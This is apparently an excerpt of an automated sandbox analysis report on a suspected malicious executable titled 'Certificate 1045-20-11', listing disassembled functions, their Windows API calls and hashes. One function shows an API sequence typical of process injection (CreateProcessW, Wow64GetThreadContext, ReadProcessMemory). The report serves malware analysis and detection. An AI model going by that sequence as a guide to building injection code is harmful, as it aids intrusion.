                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscat$FileModuleNameOpen
                                                                                • String ID: \$\Include\
                                                                                • API String ID: 3592542968-2640467822
                                                                                • Opcode ID: befc1a3c93d1882da5ce45781a59b6204c0c23ad6d919b93133e164646a450ee
                                                                                • Instruction ID: 0fbc50308fe61f6bafe10a816ed5c489bcb952de95cf64851f6f8b88e2815725
                                                                                • Opcode Fuzzy Hash: befc1a3c93d1882da5ce45781a59b6204c0c23ad6d919b93133e164646a450ee
                                                                                • Instruction Fuzzy Hash: 8E518F7142C3488FC754EF69E9859AAB7F8FF59300B40452EF644C3261EB709A08DB53
                                                                                Function 008634AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __getstream.LIBCMT ref: 008634FE
                                                                                  • Part of subcall function 00867C0E: __getptd_noexit.LIBCMT ref: 00867C0E
                                                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 00863539
                                                                                • __wopenfile.LIBCMT ref: 00863549
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                • String ID: <G
                                                                                • API String ID: 1820251861-2138716496
                                                                                • Opcode ID: 1203ad011517bbf316ad8f166c1e2ce8b3e80ecc6056e56df05d413ade311f22
                                                                                • Instruction ID: 976a5ffe9cf406afb33a03f2c1098b9214ecf50950ba2af621543638473ea710
                                                                                • Opcode Fuzzy Hash: 1203ad011517bbf316ad8f166c1e2ce8b3e80ecc6056e56df05d413ade311f22
                                                                                • Instruction Fuzzy Hash: 16110670A0020A9FDB12BF789C4276E77A4FF05364F178525E815DB281FF34CA1197A2
                                                                                Function 0085D298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0085D28B,SwapMouseButtons,00000004,?), ref: 0085D2BC
                                                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0085D28B,SwapMouseButtons,00000004,?,?,?,?,0085C865), ref: 0085D2DD
                                                                                • RegCloseKey.KERNELBASE(00000000,?,?,0085D28B,SwapMouseButtons,00000004,?,?,?,?,0085C865), ref: 0085D2FF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID: Control Panel\Mouse
                                                                                • API String ID: 3677997916-824357125
                                                                                • Opcode ID: a8add1d82806b221ec82637f86187d4a7de08d58090e60129b989ce45bf03501
                                                                                • Instruction ID: bff932b4aef1569e896673283d41c2b7091580c426787dfcb2cdef7ffc32ae4e
                                                                                • Opcode Fuzzy Hash: a8add1d82806b221ec82637f86187d4a7de08d58090e60129b989ce45bf03501
                                                                                • Instruction Fuzzy Hash: 39112375611309FFDB209FA8CC85EEE7BB8FF44785F104869AC05D7220E631AE499B60
                                                                                Function 00EAEDF8 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 00EAF5B3
                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00EAF649
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00EAF66B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1723876802.0000000000EAD000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ead000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 2438371351-0
                                                                                • Opcode ID: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                                                                • Instruction ID: 8267fa99b85c051e5a1b0df32aba3be8c63595a444b7e35b263e2d8b226700e0
                                                                                • Opcode Fuzzy Hash: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                                                                • Instruction Fuzzy Hash: F062FA30A142189BEB24CFA4C851BDEB376EF59304F1091A9D10DFB3A4E7799E81CB59
                                                                                Function 00842322 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 159COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 008422A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,008424F1), ref: 00842303
                                                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 008425A1
                                                                                • CoInitialize.OLE32(00000000), ref: 00842618
                                                                                • CloseHandle.KERNEL32(00000000), ref: 008B503A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                                • String ID: xH
                                                                                • API String ID: 3815369404-622052890
                                                                                • Opcode ID: d3f748e88150bd5e32106bb68ace77583928a74b5ef6bf42c1e61d0684a9613a
                                                                                • Instruction ID: ec6a0074fdadb9ed0ba6ed60965dc164a788d1d18a87e945ae2c1d57343a8384
                                                                                • Opcode Fuzzy Hash: d3f748e88150bd5e32106bb68ace77583928a74b5ef6bf42c1e61d0684a9613a
                                                                                • Instruction Fuzzy Hash: 3271ADB492D3898FC718EF6EAD90459BBE4FB98344790426EE129CB3B2CB304444EF15
                                                                                Function 0088C396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00844517: _fseek.LIBCMT ref: 0084452F
                                                                                  • Part of subcall function 0088C56D: _wcscmp.LIBCMT ref: 0088C65D
                                                                                  • Part of subcall function 0088C56D: _wcscmp.LIBCMT ref: 0088C670
                                                                                • _free.LIBCMT ref: 0088C4DD
                                                                                • _free.LIBCMT ref: 0088C4E4
                                                                                • _free.LIBCMT ref: 0088C54F
                                                                                  • Part of subcall function 00861C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00867A85), ref: 00861CB1
                                                                                  • Part of subcall function 00861C9D: GetLastError.KERNEL32(00000000,?,00867A85), ref: 00861CC3
                                                                                • _free.LIBCMT ref: 0088C557
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                • String ID:
                                                                                • API String ID: 1552873950-0
                                                                                • Opcode ID: acbc9bddfc27afc87d88584c9959c104a0ea567534d53ec5d359cc2505f852cb
                                                                                • Instruction ID: 8484ce7fe6f3f54e97704e7c71dce5170660b6ce3766dc5cef8bdf588f18326f
                                                                                • Opcode Fuzzy Hash: acbc9bddfc27afc87d88584c9959c104a0ea567534d53ec5d359cc2505f852cb
                                                                                • Instruction Fuzzy Hash: A4514EB1904218AFDF149F68DC81BADBBB9FF48314F1004AEF259E3241DB715A808F59
                                                                                Function 0085EB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 0085EBB2
                                                                                  • Part of subcall function 008451AF: _memset.LIBCMT ref: 0084522F
                                                                                  • Part of subcall function 008451AF: _wcscpy.LIBCMT ref: 00845283
                                                                                  • Part of subcall function 008451AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00845293
                                                                                • KillTimer.USER32(?,00000001,?,?), ref: 0085EC07
                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0085EC16
                                                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008B3C88
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                • String ID:
                                                                                • API String ID: 1378193009-0
                                                                                • Opcode ID: 8f1e3eefd42f91793c22973fdf84ebe0e7f9107419fcb2f685b6b29805144077
                                                                                • Instruction ID: 244274af96dd8d1b918848bbda35da34666c368dda14c938654a9cad70fdd102
                                                                                • Opcode Fuzzy Hash: 8f1e3eefd42f91793c22973fdf84ebe0e7f9107419fcb2f685b6b29805144077
                                                                                • Instruction Fuzzy Hash: 462183705047949FE7369B688C59BEABFECFB05308F04049DE69E96241C3746A848B51
                                                                                Function 008440E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 008B3725
                                                                                • GetOpenFileNameW.COMDLG32 ref: 008B376F
                                                                                  • Part of subcall function 0084660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008453B1,?,?,008461FF,?,00000000,00000001,00000000), ref: 0084662F
                                                                                  • Part of subcall function 008440A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008440C6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Name$Path$FileFullLongOpen_memset
                                                                                • String ID: X
                                                                                • API String ID: 3777226403-3081909835
                                                                                • Opcode ID: bdaa14a7987305b73ceff32dc7562e2bdb0b4f71e431f2a37cbdffd006293c59
                                                                                • Instruction ID: d600103969a747dda012926d76c647b0171d39898d4d5654281c10219d480ea6
                                                                                • Opcode Fuzzy Hash: bdaa14a7987305b73ceff32dc7562e2bdb0b4f71e431f2a37cbdffd006293c59
                                                                                • Instruction Fuzzy Hash: 7821C371A1029CABCB01DFD8D805BEE7BF8FF49304F00406AE504E7241DBB49A898F66
                                                                                Function 0088C71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 0088C72F
                                                                                • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0088C746
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Temp$FileNamePath
                                                                                • String ID: aut
                                                                                • API String ID: 3285503233-3010740371
                                                                                • Opcode ID: aafaa6f7cacdb419289e95cac12c21d990c43019f72d704209179cb0b3730768
                                                                                • Instruction ID: df8d9006ab93e60f27dd6acaefe45ace6389613f3391f695e3f34e413c20e349
                                                                                • Opcode Fuzzy Hash: aafaa6f7cacdb419289e95cac12c21d990c43019f72d704209179cb0b3730768
                                                                                • Instruction Fuzzy Hash: 8FD05E7250030EABDB10BBA0DC0EF9ABB7CA700704F0001A07750E51B1DAB4E6998B54
                                                                                Function 0089F8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e3cc333a5524cc46e484466346db681418ecad4c97e8854e54843a65c57f37c9
                                                                                • Instruction ID: a3b559a59c6974d308a40b1b62eb9877622157d18c7d634b86d94aec219964eb
                                                                                • Opcode Fuzzy Hash: e3cc333a5524cc46e484466346db681418ecad4c97e8854e54843a65c57f37c9
                                                                                • Instruction Fuzzy Hash: 4DF159716043059FCB14EF28C885B5AB7E5FF89314F14892EF995DB292DB70E905CB82
                                                                                Function 00844FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00845022
                                                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 008450CB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: IconNotifyShell__memset
                                                                                • String ID:
                                                                                • API String ID: 928536360-0
                                                                                • Opcode ID: 1159f5d09bcc62b564c5f5ad9554fdfb0a5ee80c7046618148951912286ada8d
                                                                                • Instruction ID: 522dba7d8f194fc746577dd4b464c318addb3163f131c67df11fd3e9cd9ef8a0
                                                                                • Opcode Fuzzy Hash: 1159f5d09bcc62b564c5f5ad9554fdfb0a5ee80c7046618148951912286ada8d
                                                                                • Instruction Fuzzy Hash: 99318FB0508B05CFC725EF28D84569BBBF8FF48308F00092EE69AC3241E771A944CB96
                                                                                Function 0086395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __FF_MSGBANNER.LIBCMT ref: 00863973
                                                                                  • Part of subcall function 008681C2: __NMSG_WRITE.LIBCMT ref: 008681E9
                                                                                  • Part of subcall function 008681C2: __NMSG_WRITE.LIBCMT ref: 008681F3
                                                                                • __NMSG_WRITE.LIBCMT ref: 0086397A
                                                                                  • Part of subcall function 0086821F: GetModuleFileNameW.KERNEL32(00000000,00900312,00000104,00000000,00000001,00000000), ref: 008682B1
                                                                                  • Part of subcall function 0086821F: ___crtMessageBoxW.LIBCMT ref: 0086835F
                                                                                  • Part of subcall function 00861145: ___crtCorExitProcess.LIBCMT ref: 0086114B
                                                                                  • Part of subcall function 00861145: ExitProcess.KERNEL32 ref: 00861154
                                                                                  • Part of subcall function 00867C0E: __getptd_noexit.LIBCMT ref: 00867C0E
                                                                                • RtlAllocateHeap.NTDLL(00C60000,00000000,00000001,00000001,00000000,?,?,0085F507,?,0000000E), ref: 0086399F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                • String ID:
                                                                                • API String ID: 1372826849-0
                                                                                • Opcode ID: 89fec7069764d45ace3846e1ce3d7e07fbdae052d6311f0cae41ce0b356a06fe
                                                                                • Instruction ID: b9ccd78016450b5ac13e89763739bc7e1dbb5e56f833995f5bc2da94ad47d0f9
                                                                                • Opcode Fuzzy Hash: 89fec7069764d45ace3846e1ce3d7e07fbdae052d6311f0cae41ce0b356a06fe
                                                                                • Instruction Fuzzy Hash: 6201B5313497119AEA213B29EC56B2A3758FF83764F27012AF505DB2D2DFB09D009AA5
                                                                                Function 0088C6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0088C385,?,?,?,?,?,00000004), ref: 0088C6F2
                                                                                • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0088C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0088C708
                                                                                • CloseHandle.KERNEL32(00000000,?,0088C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0088C70F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandleTime
                                                                                • String ID:
                                                                                • API String ID: 3397143404-0
                                                                                • Opcode ID: 13c6bfc6562490912f7fa768d1a61e5fa0e8132957ab13b7abe051b1e710c507
                                                                                • Instruction ID: dcaa24b9a1d715b4d201400fd1a010dd7e5d10bf7b0ec71649737f7ba5f264ce
                                                                                • Opcode Fuzzy Hash: 13c6bfc6562490912f7fa768d1a61e5fa0e8132957ab13b7abe051b1e710c507
                                                                                • Instruction Fuzzy Hash: 24E08632140314B7D7213B54AC0DFCABB28FB45760F144121FB14690E097B125118798
                                                                                Function 0088BB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _free.LIBCMT ref: 0088BB72
                                                                                  • Part of subcall function 00861C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00867A85), ref: 00861CB1
                                                                                  • Part of subcall function 00861C9D: GetLastError.KERNEL32(00000000,?,00867A85), ref: 00861CC3
                                                                                • _free.LIBCMT ref: 0088BB83
                                                                                • _free.LIBCMT ref: 0088BB95
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 8d6c99314b0704041c66cbc9d98ad607d1a0ae96d99a55b8255782f8bd4ba31d
                                                                                • Instruction ID: 1a96c80dfb6ae4827dd4c9ca0c0209b6f1519d3d18afe30b805e50cb29acb174
                                                                                • Opcode Fuzzy Hash: 8d6c99314b0704041c66cbc9d98ad607d1a0ae96d99a55b8255782f8bd4ba31d
                                                                                • Instruction Fuzzy Hash: 4DE012A164174187DE34757D6E48EB713CCEF443617190C1DB459E7147DF24E84086A8
                                                                                Function 008A0828 Relevance: 3.2, APIs: 2, Instructions: 232COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _strcat.LIBCMT ref: 008A08FD
                                                                                  • Part of subcall function 0084936C: __swprintf.LIBCMT ref: 008493AB
                                                                                  • Part of subcall function 0084936C: __itow.LIBCMT ref: 008493DF
                                                                                • _wcscpy.LIBCMT ref: 008A098C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: __itow__swprintf_strcat_wcscpy
                                                                                • String ID:
                                                                                • API String ID: 1012013722-0
                                                                                • Opcode ID: f4677e7adb6ae48fe212dbf0a89f76291c6cf1233f8158a5976575b7902ef679
                                                                                • Instruction ID: 4705ef2ae783682bd3034d52305367f1522b29745537c243c239a83df7a97ff4
                                                                                • Opcode Fuzzy Hash: f4677e7adb6ae48fe212dbf0a89f76291c6cf1233f8158a5976575b7902ef679
                                                                                • Instruction Fuzzy Hash: A4911534A00618DFDB28DF18C4919A9B7E5FF4A314B55806AE85ACB7A2DB30FD41CF81
                                                                                Function 00843A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsThemeActive.UXTHEME ref: 00843A73
                                                                                  • Part of subcall function 00861405: __lock.LIBCMT ref: 0086140B
                                                                                  • Part of subcall function 00843ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00843AF3
                                                                                  • Part of subcall function 00843ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00843B08
                                                                                  • Part of subcall function 00843D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00843AA3,?), ref: 00843D45
                                                                                  • Part of subcall function 00843D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00843AA3,?), ref: 00843D57
